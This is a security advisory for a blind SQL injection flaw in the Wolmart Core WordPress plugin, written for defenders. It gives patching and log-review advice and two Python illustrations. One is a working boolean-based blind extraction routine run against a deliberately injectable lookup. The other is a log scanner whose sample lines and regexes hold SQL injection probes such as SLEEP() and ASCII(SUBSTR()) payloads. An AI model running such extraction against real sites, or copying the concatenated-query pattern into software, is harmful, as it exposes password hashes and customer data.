Platform: wordpress
Component: wolmart-core
Fixed in: 1.9.7
CVE-2025-69337 is a critical SQL injection vulnerability in the Wolmart Core WordPress plugin. The flaw is a blind SQL injection: attacker-controlled input reaches a database query without proper sanitisation, but the response does not echo query results, so an attacker has to infer data indirectly. Exploitation can lead to unauthorized access to, and potentially manipulation of, database contents. Versions 0.0.0 through 1.9.6 are affected; version 1.9.7 contains the fix.
The vulnerability lets an attacker supply input that is incorporated into a query the plugin sends to the WordPress database, so the attacker controls part of the SQL rather than just a value. Because the injection is blind, the application returns neither query results nor database errors; the attacker instead asks the database yes/no questions and reads the answer from a side channel, either a difference in the response (boolean-based) or a deliberate delay introduced with a function such as MySQL's SLEEP() (time-based). With enough requests, any data the site's database user can read can be recovered this way: usernames and password hashes from wp_users, e-mail addresses and, on a store, customer and order records. Whether records can also be modified depends on the query the input reaches: WordPress's $wpdb executes one statement per call, so stacked queries (appending an UPDATE after the original statement) are generally not available, and the realistic primary impact is data disclosure. The exposure is serious for the plugin's typical deployment, e-commerce sites, where personal, address and order data accumulate in the database.
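The inference described above, as an added illustration that is not code from Wolmart Core or from its vendor: a hypothetical product lookup that concatenates its input into SQL and reports only whether a row exists, the same lookup hardened with a bound parameter, and a boolean-based extraction routine that recovers a password hash from that yes/no answer alone. The schema, table contents, function names and query are constructed for the example; SQLite is used so it runs offline (a time-based variant would replace the boolean condition with a call such as MySQL's SLEEP(), which SQLite does not have).

```python
import sqlite3

# Constructed in-memory stand-in for a WordPress database. The schema,
# the lookup function and the query are hypothetical illustrations of the
# bug class; the plugin's real code is not reproduced here.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_users VALUES (1, 'admin', '$P$BexampleHashValue1');
CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_name TEXT, post_type TEXT);
INSERT INTO wp_posts VALUES (10, 'blue-widget', 'product');
""")


def product_exists_vulnerable(slug: str) -> bool:
    """Hypothetical unsafe lookup: the slug is concatenated into SQL, and the
    caller only learns whether a row came back. No data or error is echoed,
    which is exactly the blind situation."""
    sql = f"SELECT ID FROM wp_posts WHERE post_name = '{slug}' AND post_type = 'product'"
    return conn.execute(sql).fetchone() is not None


def product_exists_safe(slug: str) -> bool:
    """Hardened form: the slug is bound as a parameter, so it can never alter
    the statement's structure (the $wpdb->prepare() idiom in WordPress)."""
    sql = "SELECT ID FROM wp_posts WHERE post_name = ? AND post_type = 'product'"
    return conn.execute(sql, (slug,)).fetchone() is not None


def boolean_blind_extract(oracle, column: str, where: str, max_len: int = 64) -> str:
    """Recover one string from wp_users using only the oracle's True/False
    answers. Each character is located by binary search over printable ASCII
    code points, so about seven requests per character instead of up to 95."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the string has no character at this position.
        probe = f"x' OR (SELECT length({column}) FROM wp_users WHERE {where}) >= {pos} -- "
        if not oracle(probe):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (f"x' OR (SELECT unicode(substr({column}, {pos}, 1)) "
                     f"FROM wp_users WHERE {where}) > {mid} -- ")
            if oracle(probe):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


def count_requests(oracle):
    """Wrap an oracle so the number of requests it took can be reported."""
    counter = {"n": 0}

    def counted(payload):
        counter["n"] += 1
        return oracle(payload)

    return counted, counter


if __name__ == "__main__":
    oracle, stats = count_requests(product_exists_vulnerable)
    leaked = boolean_blind_extract(oracle, "user_pass", "user_login = 'admin'")
    print(f"vulnerable: leaked {leaked!r} in {stats['n']} requests")
    leaked_safe = boolean_blind_extract(product_exists_safe, "user_pass", "user_login = 'admin'")
    print(f"hardened:   leaked {leaked_safe!r}")
```

Against the concatenating lookup the full 21-character hash comes back in roughly 40 requests; against the parameterised lookup the first length probe is simply treated as a nonexistent slug and nothing is recovered. The request count is the point a defender should take away: automated blind extraction shows up in logs as a burst of near-identical requests to one endpoint from one source.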
CVE-2025-69337 was published on 2026-02-20. It is rated critical because a blind SQL injection can be driven to full disclosure of whatever the site's database user can read. No public proof-of-concept code had been released at the time of writing; blind SQL injection is, however, routinely automated by off-the-shelf tooling once the vulnerable parameter is known, so exploitation should be assumed feasible. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
Exploit Status
EPSS: 0.04% (12th percentile)
CISA SSVC:
CVSS Vector:
The primary mitigation for CVE-2025-69337 is to update the Wolmart Core plugin to version 1.9.7 or later. If the update cannot be applied immediately because of compatibility concerns, deactivate the plugin until it can; WordPress does not load a deactivated plugin's code, so its request handlers cannot be reached. Generic SQL injection rules in a WAF (signatures for SLEEP() and BENCHMARK(), quote-and-comment sequences such as '-- , and tautologies such as AND 1=1) apply to blind injection just as they do to other variants; the difficulty is only that the vulnerable parameter is not public, so a rule cannot be narrowly scoped to it. Review web server access logs for the plugin's endpoints, looking for SQL keywords in parameter values and for bursts of near-identical requests from one source, which is what automated character-by-character extraction looks like; the MySQL slow query log, with long_query_time set low enough, will also record time-based probes that call SLEEP(). Finally, all WordPress plugins share the site's single database user, so the plugin's access cannot be restricted on its own; confine that user to the WordPress database only, with no FILE or administrative privileges, to limit what an injection can reach.
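The log review recommended above, as an added example that is not part of the original advisory or the plugin's code: a small scanner that parses combined-format access-log lines, URL-decodes each request target, flags the probe patterns a blind injection needs (delay functions, tautologies, character-extraction functions, comment terminators) and counts flagged requests per client so that scripted extraction stands out from a one-off. The sample lines, addresses, paths and the `action=example_lookup` parameter are constructed placeholders, not the plugin's real endpoints. Two caveats: POST bodies are not in access logs, so this only sees GET parameters, and encoded or obfuscated payloads (double encoding, `/**/` in place of spaces) will evade simple regexes; treat it as a triage aid, not a WAF.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines in the combined access-log format used by nginx
# and Apache. The addresses, paths and parameter names are placeholders,
# not the plugin's real endpoints.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Feb/2026:10:01:02 +0000] "GET /shop/?s=widget HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Feb/2026:10:01:05 +0000] "GET /shop/?s=widget%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.9 - - [20/Feb/2026:10:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=example_lookup&id=12 HTTP/1.1" 200 300 "-" "curl/8.0"
198.51.100.9 - - [20/Feb/2026:10:02:12 +0000] "GET /wp-admin/admin-ajax.php?action=example_lookup&id=12%20AND%201%3D1 HTTP/1.1" 200 300 "-" "curl/8.0"
198.51.100.9 - - [20/Feb/2026:10:02:13 +0000] "GET /wp-admin/admin-ajax.php?action=example_lookup&id=12%20AND%201%3D2 HTTP/1.1" 200 287 "-" "curl/8.0"
198.51.100.9 - - [20/Feb/2026:10:02:14 +0000] "GET /wp-admin/admin-ajax.php?action=example_lookup&id=12%20AND%20ASCII(SUBSTR((SELECT%20user_pass%20FROM%20wp_users%20LIMIT%201),1,1))%3E64 HTTP/1.1" 200 300 "-" "curl/8.0"
192.0.2.4 - - [20/Feb/2026:10:03:00 +0000] "GET /product/blue-widget/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures for the probes a blind injection needs. Applied to the
# URL-decoded request target, case-insensitively.
SIGNATURES = {
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I),
    "boolean-based": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b|'\s*(and|or)\s+'", re.I),
    "char-extraction": re.compile(r"\b(ascii|unicode|ord|substr|substring|mid)\s*\(", re.I),
    "comment-terminator": re.compile(r"--(\s|$)|/\*"),
}


def parse_line(line: str):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["target"])
    return rec


def classify(decoded_target: str):
    """Names of the signature classes that match a decoded request target."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_target)]


def scan(log_text: str):
    """Return (hits, per_source): flagged requests and a count per client IP."""
    hits, per_source = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kinds = classify(rec["decoded"])
        if kinds:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                         "size": rec["size"], "target": rec["decoded"], "kinds": kinds})
            per_source[rec["ip"]] += 1
    return hits, per_source


def likely_automated(per_source: Counter, threshold: int = 3):
    """Sources whose volume of probes suggests scripted extraction, not a one-off."""
    return sorted(ip for ip, n in per_source.items() if n >= threshold)


if __name__ == "__main__":
    hits, per_source = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']:<14} {','.join(h['kinds']):<32} {h['target']}")
    print("likely automated:", likely_automated(per_source))
```

On the sample the single SLEEP() probe from 203.0.113.7 is flagged on its own, while 198.51.100.9 produces three flagged requests to the same endpoint within seconds (an AND 1=1 / AND 1=2 pair followed by an ASCII(SUBSTR(...)) probe), which is the shape of boolean-based extraction and is what the per-source threshold is there to surface. The differing response size on the 1=2 request is the side channel the attacker is reading.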
Update to version 1.9.7, or a newer patched version
CVE-2025-69337 is a critical blind SQL injection vulnerability affecting Wolmart Core WordPress plugin versions 0.0.0 through 1.9.6 that allows an attacker to extract data from the site's database.
If you are running Wolmart Core versions 0.0.0 through 1.9.6, your site is affected by this SQL injection flaw.
Update the Wolmart Core plugin to version 1.9.7 or later to resolve the vulnerability. If an immediate update is not possible, deactivate the plugin until it can be applied.
No active exploitation has been confirmed and the CVE is not in the CISA KEV catalog, but blind SQL injection is straightforward to automate once the injection point is known, so monitor access logs for the probe patterns described above and apply the update promptly.
Refer to the official Wolmart Core plugin website or the don-themes support channels for the latest advisory and updates regarding CVE-2025-69337.